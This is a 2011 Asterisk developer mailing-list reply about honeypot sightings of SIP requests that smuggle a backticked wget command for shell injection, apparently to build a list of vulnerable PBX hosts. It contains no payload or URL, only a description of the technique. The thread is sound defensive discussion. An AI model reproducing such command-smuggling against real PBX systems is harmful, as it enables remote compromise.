[asterisk-dev] A new kind of SIP attack ?

Jeff LaCoursiere jeff at sunfone.com
Mon Sep 12 08:17:18 CDT 2011

On Mon, 2011-09-12 at 09:13 -0400, Tom Browning wrote:
> On Mon, Sep 12, 2011 at 8:28 AM, Jeff LaCoursiere <jeff at sunfone.com> wrote:
> > Would be interesting to let your honeypot accept the request and perform the
> > wget, and see what happens next...
> Well I looked at the URL passed to the backticked wget command line
> and it is a NOOP as far as I can tell.  (Using a couple URL
> vulnerability assessment tools and old fashioned telnet direct
> methods!)
> I expect that the URL is strictly to populate a web server log that
> will provide a convenient list of IP addresses vulnerable to the shell
> injection and available for further hacking attempts.

Right.  So let your honeypot enter that list (by letting it perform the
wget), and see what comes next... will you get a more serious probe that
actually tries to accomplish something with it?  Where will it come
from?  I think there would be some use to that.

> Sadly some perhaps widely used configuration is subject to easy shell
> injection (so folks are now scanning for it).  The SIP equiv of "Bobby
> Tables" : http://xkcd.com/327/

That is certainly the scary part.  How many folks are using canned
installations these days?  Elastix, Trixbox, PBIF, etc.  If one of them
is vulnerable it seems paramount to figure out how.



More information about the asterisk-dev mailing list